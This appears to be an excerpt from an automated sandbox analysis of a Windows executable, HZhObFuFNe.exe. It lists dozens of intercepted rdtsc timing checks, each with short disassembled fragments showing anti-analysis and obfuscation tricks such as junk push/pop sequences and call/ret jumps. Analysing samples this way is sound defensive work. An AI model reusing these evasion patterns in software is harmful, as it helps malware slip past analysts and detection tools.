Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521923 second address: 152194A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F6FA52293C5h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152194A second address: 152195A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152195A second address: 152195F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15225C0 second address: 15225C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15225C4 second address: 15225E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA52293C9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522921 second address: 1522927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522ABF second address: 1522AC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AC9 second address: 1522AE2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA4524818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA452481Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AE2 second address: 1522AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AE8 second address: 1522AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522EDC second address: 1522EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F6FA52293C0h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522EF9 second address: 1522F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2D93h], ebx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F6FA4524818h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F6FA4524818h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 add si, 4816h 0x0000004a xchg eax, ebx 0x0000004b push edx 0x0000004c jc 00007F6FA452481Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F5B second address: 1522F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F6FA52293B6h 0x0000000f jne 00007F6FA52293B6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F71 second address: 1522F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F77 second address: 1522F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15236D2 second address: 15236DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA4524816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524130 second address: 1524142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6FA52293BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15236DC second address: 152370B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA4524818h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007F6FA452482Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524947 second address: 152494D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152494D second address: 1524974 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA4524818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6FA4524820h 0x00000013 je 00007F6FA4524816h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524974 second address: 152497A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525361 second address: 15253BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6FA4524818h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 sbb edi, 3C711DC7h 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+12459475h] 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a ja 00007F6FA4524816h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15253BC second address: 15253DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F6FA52293C3h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525EFC second address: 1525F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525CE0 second address: 1525D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA52293C0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0D4 second address: 152A0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1527316 second address: 152731A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1527F2B second address: 1527F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0D8 second address: 152A0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0E2 second address: 152A0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0E6 second address: 152A101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6FA52293C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A101 second address: 152A180 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, dword ptr [ebp+1247E896h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6FA4524818h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jbe 00007F6FA4524827h 0x00000031 jmp 00007F6FA4524821h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F6FA4524818h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1AECh] 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F6FA4524820h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152B208 second address: 152B20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152B20C second address: 152B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2A9Eh], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6FA4524818h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c add di, CE3Eh 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D2FFDh], ebx 0x0000003a mov dword ptr [ebp+122D244Dh], edi 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jl 00007F6FA4524816h 0x0000004b jmp 00007F6FA452481Ah 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C17B second address: 152C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C17F second address: 152C189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C189 second address: 152C1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6FA52293C5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1AC second address: 152C1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1BA second address: 152C1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1BE second address: 152C1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+1247E54Ah], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1245AA31h], edi 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1DE second address: 152C1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1E2 second address: 152C1E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1E8 second address: 152C1FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F6FA52293B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D314 second address: 152D318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D318 second address: 152D31C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D31C second address: 152D327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D3E4 second address: 152D3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1532715 second address: 153271A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354D3 second address: 15354DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6FA52293B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354DE second address: 15354E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354E4 second address: 1535567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F6FA52293D0h 0x00000012 jnc 00007F6FA52293CAh 0x00000018 nop 0x00000019 xor dword ptr [ebp+122D2A9Eh], ecx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F6FA52293B8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b add edi, dword ptr [ebp+122D3949h] 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1E59h], ebx 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b pushad 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337B6 second address: 15337BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337BB second address: 15337C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337C0 second address: 153384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6FA4524816h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D2133h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, D7h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 jns 00007F6FA452481Ch 0x0000002a mov eax, dword ptr [ebp+122D0275h] 0x00000030 xor edi, 52A6B300h 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F6FA4524818h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 call 00007F6FA4524829h 0x00000057 jno 00007F6FA452481Ch 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15374B3 second address: 15374B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15374B7 second address: 15374C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1536790 second address: 1536795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1536795 second address: 15367AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524825h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538557 second address: 1538567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538567 second address: 153856B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1537653 second address: 1537659 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538709 second address: 153870F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153A562 second address: 153A566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153A566 second address: 153A56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15397B9 second address: 15397D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153D3A8 second address: 153D3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA452481Dh 0x00000011 jmp 00007F6FA452481Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153D3D2 second address: 153D3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E199F second address: 14E19B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F6FA4524816h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F6FA4524816h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19B8 second address: 14E19DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA52293B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA52293C7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19DE second address: 14E19EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6FA4524816h 0x0000000a ja 00007F6FA4524816h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19EE second address: 14E19F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154159D second address: 15415BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F6FA4524818h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F6FA4524820h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545EE8 second address: 1545F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6FA52293B6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F6FA52293C3h 0x00000011 popad 0x00000012 pushad 0x00000013 jnc 00007F6FA52293B6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545F14 second address: 1545F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14DE453 second address: 14DE457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545599 second address: 154559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154559D second address: 15455C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15455C1 second address: 15455FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F6FA4524816h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jns 00007F6FA4524816h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007F6FA4524816h 0x0000001b jmp 00007F6FA4524827h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007F6FA4524816h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15455FF second address: 1545603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545756 second address: 1545775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA4524816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA452481Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
